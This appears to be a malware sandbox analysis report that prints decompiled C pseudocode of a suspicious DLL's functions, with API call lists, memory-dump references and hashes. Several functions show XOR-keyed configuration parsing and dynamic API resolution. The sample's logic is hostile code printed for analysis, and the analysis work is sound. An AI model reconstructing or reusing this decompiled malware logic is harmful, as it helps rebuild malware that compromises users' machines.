                                                                                                                                                                                                                                      • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                                                                                                                                                                                                      • Part of subcall function 00401179: GetLastError.KERNEL32 ref: 0040122D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00401401), ref: 00401E8F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2673762927-0
                                                                                                                                                                                                                                    • Opcode ID: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                                                                                                                                                                                                    • Instruction ID: 7a28e5235208ce399f98616bf791f331da11f6e25b936d66cc8c9f92ca0095d4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111CB76600705ABD721ABA5CC80DAF77BCAF89318704417AED01B76A1E7B4ED0687E4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E02F921CD(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                    				signed short _t11;
                                                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				signed short* _t22;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t24 = 0;
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_t19 = 1;
                                                                                                                                                                                                                                    				_t27 = 0x2f9d330;
                                                                                                                                                                                                                                    				E02F984D5();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t8 = E02F912D4(_a4,  &_v8); // executed
                                                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_t14 = 0xd;
                                                                                                                                                                                                                                    					_t15 = E02F9809F(_t14);
                                                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, 0, _v8);
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *_t27 = _t15;
                                                                                                                                                                                                                                    						_t27 = _t27 + 4;
                                                                                                                                                                                                                                    						_t24 = _t24 + 1;
                                                                                                                                                                                                                                    						if(_t24 < 3) {
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                    					E02F984D5();
                                                                                                                                                                                                                                    					if(_t19 != 0) {
                                                                                                                                                                                                                                    						_t22 =  *0x2f9d338; // 0x33e9b70
                                                                                                                                                                                                                                    						_t11 =  *_t22 & 0x0000ffff;
                                                                                                                                                                                                                                    						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                    							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t22 = _t12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t19;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t19 = 0;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F984D5: GetProcAddress.KERNEL32(36776F57,02F921E5), ref: 02F984F0
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 02F912FF
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02F91321
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: memset.NTDLL ref: 02F9133B
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02F91379
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02F9138D
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F913A4
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02F913B0
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: lstrcat.KERNEL32(?,642E2A5C), ref: 02F913F1
                                                                                                                                                                                                                                      • Part of subcall function 02F912D4: FindFirstFileA.KERNELBASE(?,?), ref: 02F91407
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: lstrlen.KERNEL32(?,00000000,02F9D330,00000001,02F92200,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9), ref: 02F980A8
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: mbstowcs.NTDLL ref: 02F980CF
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: memset.NTDLL ref: 02F980E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,02F9D00C,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9,02F9D00C,?,02F923E9), ref: 02F9221C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 983081259-0
                                                                                                                                                                                                                                    • Opcode ID: eb1d807357836c940b2a12cf31a712e6183425ef4ba7188cf3410d4df421dadf
                                                                                                                                                                                                                                    • Instruction ID: 81aa2435b0713757c65f5cda8b607e478a9f1a40b5e640fc35469af42d5d49b3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb1d807357836c940b2a12cf31a712e6183425ef4ba7188cf3410d4df421dadf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6901D836B00204BAFF106FEADD80F7AB69AEB967E8F500036BF49D6050D7659C519B20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F91262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                                                    				signed short _t18;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				signed short _t27;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                    					_t18 = E02F99318(_a4, _a8, _a12, __esi); // executed
                                                                                                                                                                                                                                    					_t27 = _t18;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t27 = E02F96BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                                                                                                                    						_t26 = _a8 >> 1;
                                                                                                                                                                                                                                    						if(_t26 == 0) {
                                                                                                                                                                                                                                    							_t27 = 2;
                                                                                                                                                                                                                                    							HeapFree( *0x2f9d238, 0, _a12);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t24 = _a12;
                                                                                                                                                                                                                                    							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                                                                                                                                                                                                    							 *__esi = _t24;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t27;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,80000002,76D7F710,?,?,76D7F710,00000000,?,02F9743A,?,004F0053,033E9388,00000000,?), ref: 02F912AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: b8638f7843b9126a83d7df30b07a0f565fce0e10bc92a63deb92ccfe78dbb3fa
                                                                                                                                                                                                                                    • Instruction ID: 0c0d11f8792459002bab31f14b754910ab401cab3051b15216e871e1184b8052
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8638f7843b9126a83d7df30b07a0f565fce0e10bc92a63deb92ccfe78dbb3fa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E011D3214024AFBEF22AF44CC01FAB7BAAEB947A0F558439FB199A160D731D521DF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E02F92436(intOrPtr* __edi) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t21 = __edi;
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                                                    					Sleep(0x1f4); // executed
                                                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 02F9247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                                                    • Opcode ID: a25982af68d48e2596969862668450d027eb2710217272c1c75c4c7b4f001b69
                                                                                                                                                                                                                                    • Instruction ID: 8f66d1e12fb7a40e7d77da60602bc90e6ca88923364df436992e25612d82e5fb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a25982af68d48e2596969862668450d027eb2710217272c1c75c4c7b4f001b69
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7EF01971D01219FBEF00DB98C588AEDB7B8EF05744F1080AAEA02A3102D3B45A44CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9A66E(void* __edx, void* __edi, void* _a4) {
                                                                                                                                                                                                                                    				int _t7;
                                                                                                                                                                                                                                    				int _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t7 = E02F97323(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                                    				_t13 = _t7;
                                                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                                                    					memcpy(__edi, _a4, _t13);
                                                                                                                                                                                                                                    					 *((char*)(__edi + _t13)) = 0;
                                                                                                                                                                                                                                    					E02F99039(_a4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F97323: memcpy.NTDLL(00000000,00000090,00000002,00000002,02F9685F,00000008,02F9685F,02F9685F,?,02F9858C,02F9685F), ref: 02F97359
                                                                                                                                                                                                                                      • Part of subcall function 02F97323: memset.NTDLL ref: 02F973CF
                                                                                                                                                                                                                                      • Part of subcall function 02F97323: memset.NTDLL ref: 02F973E3
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000002,02F9685F,00000000,00000002,02F9685F,02F9685F,02F9685F,?,02F9858C,02F9685F,?,02F9685F,00000002,?,?,02F92417), ref: 02F9A68A
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3053036209-0
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: b2e07abb18055273021546b846b079f41fd234a6d698faa11137c897037cb2e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CE08672400228B6DF122A94DC00EEF7F5E8F416D1F004015FF4849200D621C9109BE1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E02F94094(int* __ecx) {
                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				char* _t31;
                                                                                                                                                                                                                                    				char* _t32;
                                                                                                                                                                                                                                    				char* _t33;
                                                                                                                                                                                                                                    				char* _t34;
                                                                                                                                                                                                                                    				char* _t35;
                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                                    				signed int _t55;
                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    				signed int _t64;
                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t86 = __ecx;
                                                                                                                                                                                                                                    				_t20 =  *0x2f9d278; // 0x63699bc3
                                                                                                                                                                                                                                    				if(E02F98748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                                                                                                                                                                                                    					 *0x2f9d2d4 = _v12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t25 =  *0x2f9d278; // 0x63699bc3
                                                                                                                                                                                                                                    				if(E02F98748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                                                                                                                                                                                                    					_push(2);
                                                                                                                                                                                                                                    					_pop(0);
		goto L60;
	} else {
		_t85 = _v12;
		if(_t85 == 0) {
			_t31 = 0;
		} else {
			_t80 =  *0x2f9d278; // 0x63699bc3
			_t31 = E02F93F7C(_t86, _t85, _t80 ^ 0x724e87bc);
		}
		if(_t31 != 0) {
			_t86 =  &_v8;
			if(StrToIntExA(_t31, 0,  &_v8) != 0) {
				 *0x2f9d240 = _v8;
			}
		}
		if(_t85 == 0) {
			_t32 = 0;
		} else {
			_t76 =  *0x2f9d278; // 0x63699bc3
			_t32 = E02F93F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
		}
		if(_t32 != 0) {
			_t86 =  &_v8;
			if(StrToIntExA(_t32, 0,  &_v8) != 0) {
				 *0x2f9d244 = _v8;
			}
		}
		if(_t85 == 0) {
			_t33 = 0;
		} else {
			_t72 =  *0x2f9d278; // 0x63699bc3
			_t33 = E02F93F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
		}
		if(_t33 != 0) {
			_t86 =  &_v8;
			if(StrToIntExA(_t33, 0,  &_v8) != 0) {
				 *0x2f9d248 = _v8;
			}
		}
		if(_t85 == 0) {
			_t34 = 0;
		} else {
			_t68 =  *0x2f9d278; // 0x63699bc3
			_t34 = E02F93F7C(_t86, _t85, _t68 ^ 0x0602e249);
		}
		if(_t34 != 0) {
			_t86 =  &_v8;
			if(StrToIntExA(_t34, 0,  &_v8) != 0) {
				 *0x2f9d004 = _v8;
			}
		}
		if(_t85 == 0) {
			_t35 = 0;
		} else {
			_t64 =  *0x2f9d278; // 0x63699bc3
			_t35 = E02F93F7C(_t86, _t85, _t64 ^ 0x3603764c);
		}
		if(_t35 != 0) {
			_t86 =  &_v8;
			if(StrToIntExA(_t35, 0,  &_v8) != 0) {
				 *0x2f9d02c = _v8;
			}
		}
		if(_t85 == 0) {
			_t36 = 0;
		} else {
			_t60 =  *0x2f9d278; // 0x63699bc3
			_t36 = E02F93F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
		}
		if(_t36 != 0) {
			_push(_t36);
			_t57 = 0x10;
			_t58 = E02F96ED2(_t57);
			if(_t58 != 0) {
				_push(_t58);
				E02F9A5D6();
			}
		}
		if(_t85 == 0) {
			_t37 = 0;
		} else {
			_t55 =  *0x2f9d278; // 0x63699bc3
			_t37 = E02F93F7C(_t86, _t85, _t55 ^ 0xb30fc035);
		}
		if(_t37 != 0 && E02F96ED2(0, _t37) != 0) {
			_t102 =  *0x2f9d32c; // 0x33e95b0
			E02F975E9(_t102 + 4, _t53);
		}
		if(_t85 == 0) {
			_t38 = 0;
		} else {
			_t50 =  *0x2f9d278; // 0x63699bc3
			_t38 = E02F93F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
		}
		if(_t38 == 0) {
			L51:
			_t39 =  *0x2f9d27c; // 0x44a5a8
			_t18 = _t39 + 0x2f9e252; // 0x616d692f
			 *0x2f9d2d0 = _t18;
			goto L52;
		} else {
			_t49 = E02F96ED2(0, _t38);
			 *0x2f9d2d0 = _t49;
			if(_t49 != 0) {
				L52:
				if(_t85 == 0) {
					_t41 = 0;
				} else {
					_t46 =  *0x2f9d278; // 0x63699bc3
					_t41 = E02F93F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
				}
				if(_t41 == 0) {
					_t42 =  *0x2f9d27c; // 0x44a5a8
					_t19 = _t42 + 0x2f9e791; // 0x6976612e
					_t43 = _t19;
				} else {
					_t43 = E02F96ED2(0, _t41);
				}
				 *0x2f9d340 = _t43;
				HeapFree( *0x2f9d238, 0, _t85);
				L60:
				return 0;
			}
			goto L51;
		}
	}
}


































                                                                                                                                                                                                                                    0x02f94111
                                                                                                                                                                                                                                    0x02f94113
                                                                                                                                                                                                                                    0x02f9411d
                                                                                                                                                                                                                                    0x02f94122
                                                                                                                                                                                                                                    0x02f94122
                                                                                                                                                                                                                                    0x02f9411d
                                                                                                                                                                                                                                    0x02f94129
                                                                                                                                                                                                                                    0x02f9413f
                                                                                                                                                                                                                                    0x02f9412b
                                                                                                                                                                                                                                    0x02f9412b
                                                                                                                                                                                                                                    0x02f94138
                                                                                                                                                                                                                                    0x02f94138
                                                                                                                                                                                                                                    0x02f94143
                                                                                                                                                                                                                                    0x02f94145
                                                                                                                                                                                                                                    0x02f9414f
                                                                                                                                                                                                                                    0x02f94154
                                                                                                                                                                                                                                    0x02f94154
                                                                                                                                                                                                                                    0x02f9414f
                                                                                                                                                                                                                                    0x02f9415b
                                                                                                                                                                                                                                    0x02f94171
                                                                                                                                                                                                                                    0x02f9415d
                                                                                                                                                                                                                                    0x02f9415d
                                                                                                                                                                                                                                    0x02f9416a
                                                                                                                                                                                                                                    0x02f9416a
                                                                                                                                                                                                                                    0x02f94175
                                                                                                                                                                                                                                    0x02f94177
                                                                                                                                                                                                                                    0x02f94181
                                                                                                                                                                                                                                    0x02f94186
                                                                                                                                                                                                                                    0x02f94186
                                                                                                                                                                                                                                    0x02f94181
                                                                                                                                                                                                                                    0x02f9418d
                                                                                                                                                                                                                                    0x02f941a3
                                                                                                                                                                                                                                    0x02f9418f
                                                                                                                                                                                                                                    0x02f9418f
                                                                                                                                                                                                                                    0x02f9419c
                                                                                                                                                                                                                                    0x02f9419c
                                                                                                                                                                                                                                    0x02f941a7
                                                                                                                                                                                                                                    0x02f941a9
                                                                                                                                                                                                                                    0x02f941b3
                                                                                                                                                                                                                                    0x02f941b8
                                                                                                                                                                                                                                    0x02f941b8
                                                                                                                                                                                                                                    0x02f941b3
                                                                                                                                                                                                                                    0x02f941bf
                                                                                                                                                                                                                                    0x02f941d5
                                                                                                                                                                                                                                    0x02f941c1
                                                                                                                                                                                                                                    0x02f941c1
                                                                                                                                                                                                                                    0x02f941ce
                                                                                                                                                                                                                                    0x02f941ce
                                                                                                                                                                                                                                    0x02f941d9
                                                                                                                                                                                                                                    0x02f941db
                                                                                                                                                                                                                                    0x02f941e5
                                                                                                                                                                                                                                    0x02f941ea
                                                                                                                                                                                                                                    0x02f941ea
                                                                                                                                                                                                                                    0x02f941e5
                                                                                                                                                                                                                                    0x02f941f1
                                                                                                                                                                                                                                    0x02f94207
                                                                                                                                                                                                                                    0x02f941f3
                                                                                                                                                                                                                                    0x02f941f3
                                                                                                                                                                                                                                    0x02f94200
                                                                                                                                                                                                                                    0x02f94200
                                                                                                                                                                                                                                    0x02f9420b
                                                                                                                                                                                                                                    0x02f9420d
                                                                                                                                                                                                                                    0x02f94210
                                                                                                                                                                                                                                    0x02f94211
                                                                                                                                                                                                                                    0x02f94218
                                                                                                                                                                                                                                    0x02f9421a
                                                                                                                                                                                                                                    0x02f9421b
                                                                                                                                                                                                                                    0x02f9421b
                                                                                                                                                                                                                                    0x02f94218
                                                                                                                                                                                                                                    0x02f94222
                                                                                                                                                                                                                                    0x02f94238
                                                                                                                                                                                                                                    0x02f94224
                                                                                                                                                                                                                                    0x02f94224
                                                                                                                                                                                                                                    0x02f94231
                                                                                                                                                                                                                                    0x02f94231
                                                                                                                                                                                                                                    0x02f9423c
                                                                                                                                                                                                                                    0x02f9424a
                                                                                                                                                                                                                                    0x02f94254
                                                                                                                                                                                                                                    0x02f94254
                                                                                                                                                                                                                                    0x02f9425b
                                                                                                                                                                                                                                    0x02f94271
                                                                                                                                                                                                                                    0x02f9425d
                                                                                                                                                                                                                                    0x02f9425d
                                                                                                                                                                                                                                    0x02f9426a
                                                                                                                                                                                                                                    0x02f9426a
                                                                                                                                                                                                                                    0x02f94275
                                                                                                                                                                                                                                    0x02f94288
                                                                                                                                                                                                                                    0x02f94288
                                                                                                                                                                                                                                    0x02f9428d
                                                                                                                                                                                                                                    0x02f94293
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f94277
                                                                                                                                                                                                                                    0x02f9427a
                                                                                                                                                                                                                                    0x02f94281
                                                                                                                                                                                                                                    0x02f94286
                                                                                                                                                                                                                                    0x02f94298
                                                                                                                                                                                                                                    0x02f9429a
                                                                                                                                                                                                                                    0x02f942b0
                                                                                                                                                                                                                                    0x02f9429c
                                                                                                                                                                                                                                    0x02f9429c
                                                                                                                                                                                                                                    0x02f942a9
                                                                                                                                                                                                                                    0x02f942a9
                                                                                                                                                                                                                                    0x02f942b4
                                                                                                                                                                                                                                    0x02f942c0
                                                                                                                                                                                                                                    0x02f942c5
                                                                                                                                                                                                                                    0x02f942c5
                                                                                                                                                                                                                                    0x02f942b6
                                                                                                                                                                                                                                    0x02f942b9
                                                                                                                                                                                                                                    0x02f942b9
                                                                                                                                                                                                                                    0x02f942d3
                                                                                                                                                                                                                                    0x02f942d8
                                                                                                                                                                                                                                    0x02f942e5
                                                                                                                                                                                                                                    0x02f942e9
                                                                                                                                                                                                                                    0x02f942e9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f94286
                                                                                                                                                                                                                                    0x02f94275

                                                                                                                                                                                                                                    APIs
